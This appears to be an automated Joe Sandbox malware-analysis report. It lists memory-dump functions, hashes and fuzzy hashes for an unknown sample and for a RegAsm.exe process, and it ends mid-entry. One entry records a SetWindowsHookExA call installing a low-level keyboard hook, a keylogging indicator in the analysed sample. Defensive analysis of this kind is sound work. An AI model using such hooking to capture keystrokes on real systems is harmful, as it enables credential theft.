Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9346c876c1f1c048efb133c4f3e73471d46052d571ce99b32bd920fb0d1a68d7
Instruction ID: 02d9c60a95243155c025c8ab300780024f429bd3fcff4004ed5f33d72f4575a7
Opcode Fuzzy Hash: 9346c876c1f1c048efb133c4f3e73471d46052d571ce99b32bd920fb0d1a68d7
Instruction Fuzzy Hash: A0F0CD3090035ADFDB59EBB8E440AACBBB1FB42214F6006A8C4055B2A5DB312906DB41

Function 032A4708 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00efff2838ad49b45bc5b4db51af1b18e8b36ed703a4a77e5040177dc0ae7142
Instruction ID: 05f1eb920a057e7fba554f2c85fb521ec40c1356899e4be6519ab707fcc36e1d
Opcode Fuzzy Hash: 00efff2838ad49b45bc5b4db51af1b18e8b36ed703a4a77e5040177dc0ae7142
Instruction Fuzzy Hash: 16F01CB4D14209DFCB44EFA9D9455ADFBF4FB4A301F0485AAD819A3350DB705A41CF40

Function 032A47D2 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4df86a3f771ef07523f97e5832e43d4c2e2cdc37b92c903c824fcc56314b063c
Instruction ID: f0bea857610d245afef7d022c46d5b6c6ba4ff378f0e820345aa1641515a1ff2
Opcode Fuzzy Hash: 4df86a3f771ef07523f97e5832e43d4c2e2cdc37b92c903c824fcc56314b063c
Instruction Fuzzy Hash: 93F06D70A20204DFC744EFB8E489B69BBF4FB0A701F6491A9E80597360DB71AD40CF40

Function 032A47E0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d407573ee5220ea70f299b2f254b49263907264ab2968510af1412565775a22
Instruction ID: 160fcc3583c495bb782f48e439c50fb518d844a1b48077faa4a9ff4baa5d2159
Opcode Fuzzy Hash: 0d407573ee5220ea70f299b2f254b49263907264ab2968510af1412565775a22
Instruction Fuzzy Hash: 40E01A74924208DFC784EFB9E449A59BBB4FB4A701F6491A9D805A3360DB71AD40CB54

Function 032A4548 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f827ba2fa4daa4f4b0252420675de24ba35e65532bace6c772d9999eea3d4835
Instruction ID: 3243a279e299c68e916a608aa8f2de8c0e66c45ba226ac9ad1b1200b9a77491a
Opcode Fuzzy Hash: f827ba2fa4daa4f4b0252420675de24ba35e65532bace6c772d9999eea3d4835
Instruction Fuzzy Hash: 51F0ECB080838A9FCB12CB68D549B89BFB0EB0B315F1846E9CC58872A2CB311941CB42

Function 032A92F2 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec232303c51209f862c1291127d4f94f562f3dbfec0ebe7312d3ed8e1699b527
Instruction ID: daa89d5dd4461c06dcfc6b0a17e758cc03d952b78585465667a10ac784f361b6
Opcode Fuzzy Hash: ec232303c51209f862c1291127d4f94f562f3dbfec0ebe7312d3ed8e1699b527
Instruction Fuzzy Hash: B6E0C930E0020CAFCB54DFA9D45569DBBF4FB44200F0085A9E80897310EB346A148F81

Function 032A4558 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04085662bb29fc387d18e6b4fd2bdd7ba9a923f10be75b2e9b60d2fed8d2cee
Instruction ID: befff63748a8f437a5cb692e6272cca21ee8c1707e6edcc3d077d2c70f467d41
Opcode Fuzzy Hash: f04085662bb29fc387d18e6b4fd2bdd7ba9a923f10be75b2e9b60d2fed8d2cee
Instruction Fuzzy Hash: 87E06D70D00309EFC740EFB8E549A5CBFF4EB09301F2046A5DC0593210EB305A40CB81

Function 032A9300 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b8e4ac4e8089ce03993f5c0b562f18d98d5a3a249d11170fd68f3ccde58bfc5
Instruction ID: 3b3cfbc55cb8e53465987375b0097050e4b8c55a33422766155f402edbcb4322
Opcode Fuzzy Hash: 9b8e4ac4e8089ce03993f5c0b562f18d98d5a3a249d11170fd68f3ccde58bfc5
Instruction Fuzzy Hash: 17E09270E0430CAFCB54EFA9D45559DBBF5AB88600F0081A9E809A7350EA346A058F81

Function 032A5038 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65a89f6179d60f305259955127035c3c5ec5f3232854d4c79014ad73bbfe9f2
Instruction ID: 5f849e5a63c460cd4ea6d9eec9cbe0beb7ffa317233a4ab4cd32b24f6bdb07de
Opcode Fuzzy Hash: e65a89f6179d60f305259955127035c3c5ec5f3232854d4c79014ad73bbfe9f2
Instruction Fuzzy Hash: 94D0C732350A354FD61ED75CF855A9D37E1BB48600F040545F846C7159CF507C0657C6

Function 032AA7C8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 390b08afb5a07857b51ca95f957c9cd3981bd71337dc0d88d65dbbb7fdfb0d82
Instruction ID: 293d76ceb59e20d068e8285c80fb540ab027146e0d64e3796ba0358bca69bebf
Opcode Fuzzy Hash: 390b08afb5a07857b51ca95f957c9cd3981bd71337dc0d88d65dbbb7fdfb0d82
Instruction Fuzzy Hash: BAC08C3200020887C710BA64E80B3003B6C8341234FAC5B10A52CC53D3E90BE80DCB42

Function 032A92C7 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c1abc008b24457a560455d407fc0be51a730c8512f8b6a08bd4407eccdf1f9
Instruction ID: 5a3792a7de2b6196346b3c1473aaf1358453916fe30e337c59cdba0c8ed30034
Opcode Fuzzy Hash: 37c1abc008b24457a560455d407fc0be51a730c8512f8b6a08bd4407eccdf1f9
Instruction Fuzzy Hash: AAD0222040E7482FC312E7A88C116867FACCB17220F5046EEE9449B3A2DA32D900A792

Function 032A4528 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46aa03604ac6a2082ac667870b1fff254304e6ff2d3c6a5795d2519b29e082e5
Instruction ID: 1a851e3cdb9eee965aad56509a2735b53804ec2e1129d874c0e4da93a5055599
Opcode Fuzzy Hash: 46aa03604ac6a2082ac667870b1fff254304e6ff2d3c6a5795d2519b29e082e5
Instruction Fuzzy Hash: 9DC02BB005870747C3202A4C701C330B3E8D303315F8C2840B40C010208FA0A080C344

Function 032AAA10 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 792da43f2407aaac1811c416914193d5173430e04635268aa04d9ac314a859a3
Instruction ID: b04c6df46ea2bcabaa88fb42ed0b1da99f23175fa6ae4d7ad960e5e5fa52dc7a
Opcode Fuzzy Hash: 792da43f2407aaac1811c416914193d5173430e04635268aa04d9ac314a859a3
Instruction Fuzzy Hash: 18C080654147404FD501A755FD415443730DE956317C017E7B419890F5D57C8945C2DE

Function 032A9DE0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc1cff1f6086f94ed0c54b1856b630d4698252ada5042476a68b00c69bf4e52a
Instruction ID: c71df0dd22ae5100e4e0b4cc62672b3cdf8a1545732f03a1919a3f91f8d11145
Opcode Fuzzy Hash: cc1cff1f6086f94ed0c54b1856b630d4698252ada5042476a68b00c69bf4e52a
Instruction Fuzzy Hash: EFC08C302843099FDB00DF48F8CAB503FADF7A861AF041410B8084B535CFAABC498F4A

Function 032AA9E8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccc15b8a64d39355b8aadb109dce86740474150e2d0c7a5fa06ebce054594be7
Instruction ID: 7ab25547d2ce932845eb3895640cb0d628a2fb774625016e27c0bc2becfe7e8b
Opcode Fuzzy Hash: ccc15b8a64d39355b8aadb109dce86740474150e2d0c7a5fa06ebce054594be7
Instruction Fuzzy Hash: 7DC04C342101049BDE04CB58E490B6637A1EBCE354FC45545E9049B364D975EC12CB41

Function 032A92D8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93ff6cdae5702a4ca58da0dd2d7a6037ac79a4bef0dbdbad684557681ce1747d
Instruction ID: dab34cf7c44f641145ed34ff4ea3dc3d0cbf95765984d95f115f61359cb4c52b
Opcode Fuzzy Hash: 93ff6cdae5702a4ca58da0dd2d7a6037ac79a4bef0dbdbad684557681ce1747d
Instruction Fuzzy Hash: 6EB0927090530CAF8620DA99980195AB7ACDA4AA10B4001D9F90887320DA72AA1066D2

Function 032AF2D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab99e55834fe41803fb35355a1dc044048462dac2642654408e5fbc6268c6cc5
Instruction ID: f1f1caeebcf4cd674ccc0692615d89891f4dd37229ecbf528579509e35d31af9
Opcode Fuzzy Hash: ab99e55834fe41803fb35355a1dc044048462dac2642654408e5fbc6268c6cc5
Instruction Fuzzy Hash: 00C04CF27983815FD301A695491AA017E6147A1702B0BD08766469E1D6E9A4E4148726

Function 032AA7D8 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1c65a1fc35193996ec9920f6f5cba271edf1be8df8752b4f6461c51be0b8f27
Instruction ID: 973024b3cf5cff8092567e770c78f66f01db095fac9d1bb58620d718e8823541
Opcode Fuzzy Hash: e1c65a1fc35193996ec9920f6f5cba271edf1be8df8752b4f6461c51be0b8f27
Instruction Fuzzy Hash: B7B0123201430C8787515758F806415739C57416347348754B03D4A2D5DE12B852C785

Function 032AAA20 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2238592c9970732a89a5ae03ff4411a1b2de6bf81cebf37aee3c0045a68b09c
Instruction ID: 750b261d4d9ba45519854a090292b5b1c06e480da2ecc5f41a596e07bd9f9c88
Opcode Fuzzy Hash: b2238592c9970732a89a5ae03ff4411a1b2de6bf81cebf37aee3c0045a68b09c
Instruction Fuzzy Hash: B2B0123200030E8FC9006754F4456143F2CE6C8725B405360F80C051259EB87C424B85

Function 032A9DF0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 753546663b4180e9343336e4661816741fd81d8c816a211e30996f76cec6121d
Instruction ID: 394f37ed91708630ee161cde5de020a984af3ab4a8afe975d860dd72193e5133
Opcode Fuzzy Hash: 753546663b4180e9343336e4661816741fd81d8c816a211e30996f76cec6121d
Instruction Fuzzy Hash: 04B0123004431E5FD901A754F5079143F5CF7C061AB401560B81C09435DFEA3C444B96

Analysis Process: RegAsm.exePID: 3508, Parent PID: 5992COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.3%
Total number of Nodes:	462
Total number of Limit Nodes:	46

Executed Functions

Function 06FA4908 Relevance: 2.9, Instructions: 2920COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14535a8273811928b60926f66f838ad2931bccf1c64efbe24d83e76ae8160c66
Instruction ID: 44fbe3d7fdbd8b28be33769a10e9a72f4e9468e86852c6622eaf1d52151d1d3b
Opcode Fuzzy Hash: 14535a8273811928b60926f66f838ad2931bccf1c64efbe24d83e76ae8160c66
Instruction Fuzzy Hash: 2B63FA71D10B1A8ADB51EF68C840A99F7B1FF99310F11D79AE45877221EB70AAC4CF81

Function 07308498 Relevance: 1.9, APIs: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.3875758566.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7300000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5f9cbb5d17c8c33ff240ffc842dd6e2d3a1b7dd923c1640740b9aeb4fc4e898
Instruction ID: 2fbd368a1206aba6ea033841c5496f76cb1c6a081a1c18ff4f53c3c800d2cf5e
Opcode Fuzzy Hash: d5f9cbb5d17c8c33ff240ffc842dd6e2d3a1b7dd923c1640740b9aeb4fc4e898
Instruction Fuzzy Hash: 28F16EB0A00309CFEB14DFA9C854BDDBBF1FF88714F158569D409AB2A5DB70A945CB81

Function 06FA8F38 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06FABC68,00000000,00000000), ref: 06FAC15B

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 30886608af1e9af4bd042567f74a0df6e5e817128d4fffbacdfb99473ffad58a
Instruction ID: 08e85494d2b6ebc7a42c48db94f2aa734b7b9c4b683a1a27dc27d3ff70602dac
Opcode Fuzzy Hash: 30886608af1e9af4bd042567f74a0df6e5e817128d4fffbacdfb99473ffad58a
Instruction Fuzzy Hash: 332135B1D002098FDB54DF9AC844BEEBBF5EB88310F10842AE418A7350D774A944CFA0

Function 014A4470 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\V(m, xrefs: 014A4727

Memory Dump Source

Source File: 00000002.00000002.3869099903.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_RegAsm.jbxd

Similarity

API ID:
String ID: \V(m
API String ID: 0-2800782923
Opcode ID: fb0c438eddf7d850cc05a3bafbc0417f6e28383eedcde68d87d750e82844fdc2
Instruction ID: 81e6658f9f80bc9de8e8c816d527c49bc00ae98aeae647c970d43ee7bcc66b19
Opcode Fuzzy Hash: fb0c438eddf7d850cc05a3bafbc0417f6e28383eedcde68d87d750e82844fdc2
Instruction Fuzzy Hash: 12B19470E00209CFDB10CFA9C88579EBBF2AF98714F5D852AD415A73A4EBB49845CF81

Function 014A4128 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\V(m, xrefs: 014A4373

Memory Dump Source

Source File: 00000002.00000002.3869099903.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_RegAsm.jbxd

Similarity

API ID:
String ID: \V(m
API String ID: 0-2800782923
Opcode ID: cc5e2fd79e2ec2fe7305ec09b1e1dcd662ab21764fb0b716b7809ab3513c71ca
Instruction ID: dc49cdb424a1bc5523c2bee58c316d237e6839c42b329f51efd9d30b33a541dd
Opcode Fuzzy Hash: cc5e2fd79e2ec2fe7305ec09b1e1dcd662ab21764fb0b716b7809ab3513c71ca
Instruction Fuzzy Hash: AA919271E00209CFDF14CFA9C9857AEBBF2AF98314F5D812AE405A73A4DBB49845CB41

Function 073765AA Relevance: 1.5, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

U, xrefs: 073765B4

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 40fd2c3d1d5b691ed001fd9ef36307edefbb859a1787bd5ad9e94ecfa48f0ea2
Instruction ID: e0d472a25af350a059c72f299e32bd612d884756d7d72f1638609c59941958e5
Opcode Fuzzy Hash: 40fd2c3d1d5b691ed001fd9ef36307edefbb859a1787bd5ad9e94ecfa48f0ea2
Instruction Fuzzy Hash: 03815AB0A006199FEB14DFA9C590A9DBBF6FF98310F648569D409EB354DB34EC42CB40

Function 0730C9F0 Relevance: .9, Instructions: 864COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3875758566.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7300000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 842efbd98c40d3011fda3c729120157f6bba8c354369ea47b868cdf6adf00121
Instruction ID: 5801fc43ca1a1c3cc12d708da2e99885cbbf0e13b5b30172f90078624604510c
Opcode Fuzzy Hash: 842efbd98c40d3011fda3c729120157f6bba8c354369ea47b868cdf6adf00121
Instruction Fuzzy Hash: 2362B370B002168FEB14DBA8C5A47ADB7F6EF88311F548569E40AEB391DB35EC41CB91

Function 07373840 Relevance: .7, Instructions: 736COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 855e166739c280a699478de4620f79ce3eafa01502b7cff481c464bf95be920f
Instruction ID: 41e9c0d4ed5595e7c1efa20c860f5b562b699fae098285ea99d8d3248d33e984
Opcode Fuzzy Hash: 855e166739c280a699478de4620f79ce3eafa01502b7cff481c464bf95be920f
Instruction Fuzzy Hash: A442D670B002568FEF24DBA9C4907ADB7F6EB99610FA44469E40AEB350DF34DC41C791

Function 07372470 Relevance: .6, Instructions: 612COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c19d98d17c34eeae7c86edc2c5d9d3778015bc93d0b72e7077fdc31fda738b8
Instruction ID: ddc1bc33a1493a26b0890893e436d760d8acd4b7e9619b22f9f2735aa1a16cb3
Opcode Fuzzy Hash: 4c19d98d17c34eeae7c86edc2c5d9d3778015bc93d0b72e7077fdc31fda738b8
Instruction Fuzzy Hash: 292253B0E0020A8BFF34DAA9C49076EB7B6FB99310F64852AE419EB351DB39DC41C751

Function 07309388 Relevance: .6, Instructions: 603COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3875758566.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7300000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ea68773710811a162d50f0bd233b4084c6f0418abd1da802b0ee1113d923843
Instruction ID: 5103addf92a8f054dcb3769668d02bdba52086a03ede652917330a71156f4c11
Opcode Fuzzy Hash: 8ea68773710811a162d50f0bd233b4084c6f0418abd1da802b0ee1113d923843
Instruction Fuzzy Hash: 4D424370E1071ACBDB14EFB5C85069DB7B1BFD9300F6186AAD44AA7250EF71AD85CB80

Function 0730E300 Relevance: .5, Instructions: 518COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3875758566.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7300000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 023dec0cda48e4fdeb999294e2bf4e99dfcaf516c78f58549db05f163cf6c3ae
Instruction ID: 495d61a0d90decb0ff4b6d5231b43bc5e7849d7a30f93f72978b999094d70b5c
Opcode Fuzzy Hash: 023dec0cda48e4fdeb999294e2bf4e99dfcaf516c78f58549db05f163cf6c3ae
Instruction Fuzzy Hash: F702B170B002168FEB14EFB5D46066EB7E2BFD4611F548869D80AEB390EF75DC428B91

Function 07377968 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 304f4f8a1a0700be615720260f31c3650fb47cf2c082c2e196d1410a4fbecaaa
Instruction ID: 35b52193e69cb59ed18578375ed66ab84b92d0ce445a9ff4afa761faaaf31ec1
Opcode Fuzzy Hash: 304f4f8a1a0700be615720260f31c3650fb47cf2c082c2e196d1410a4fbecaaa
Instruction Fuzzy Hash: 93A1C6B5B043189BEB19AB75945467E7BA7BFC9700B05846EE407DB388DE39CC02C792

Function 014AB3F0 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3869099903.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581a5f8dcac2a18689782eecd951e1f88556610ece3e6555646d4e573a1ca49b
Instruction ID: 820d1e47b618accfb8b39cfc5ecf0e8b40cbcb1c27ef36dfcdc28ee5b275df9b
Opcode Fuzzy Hash: 581a5f8dcac2a18689782eecd951e1f88556610ece3e6555646d4e573a1ca49b
Instruction Fuzzy Hash: 2B1287B182174DCBE318CF65E94E2897F61F7A1318F506789E1622E2E1DFB41646CF48

Function 014A4D40 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3869099903.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e94d8ab652835e0cc2a64b6066626578c8808dafe88090037c553a0898472b6
Instruction ID: 6ed706bf915abb0078206c4512c6c6fa45d87e1dd3f10209337717a03241b73c
Opcode Fuzzy Hash: 3e94d8ab652835e0cc2a64b6066626578c8808dafe88090037c553a0898472b6
Instruction Fuzzy Hash: 6DB19770E04209CFDB10CFA9D9857DEBBF2AF98710F59852AD414EB3A4EB749845CB81

Function 014AB264 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3869099903.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14f1c8232407a587bf23873585e5d818906def2cd1005dfe0cd4e032bd9a8619
Instruction ID: a161ad77df021985c648021f3e515c4e29656f0464edf38274d24d03ad9d1110
Opcode Fuzzy Hash: 14f1c8232407a587bf23873585e5d818906def2cd1005dfe0cd4e032bd9a8619
Instruction Fuzzy Hash: 52A16035E1031ADFCB04DFA4D8949DDBBB6FF99310F55821AE516AB360DB30A941CB90

Function 0737BD01 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 700b4475420b56f5ee03573df61bae94836954782a9a4e15dda32bb9441e18f1
Instruction ID: 94faf80f4b443f643efb1eb3886cabf70545e0c41dc50685f58a4a240ba13f79
Opcode Fuzzy Hash: 700b4475420b56f5ee03573df61bae94836954782a9a4e15dda32bb9441e18f1
Instruction Fuzzy Hash: D4817FB57002068FEB348F29D48076AF7B5FF8A710F20486AE84ACB751D639E841CB91

Function 0730B997 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3875758566.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7300000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fed1637aa1c770b8bccb6b493056e99386d58549eaf2b181ffbfe4e256ca386
Instruction ID: 375cce861cd69d0858ab6be785881f9a2041c5f051c5eba7076484109599a43b
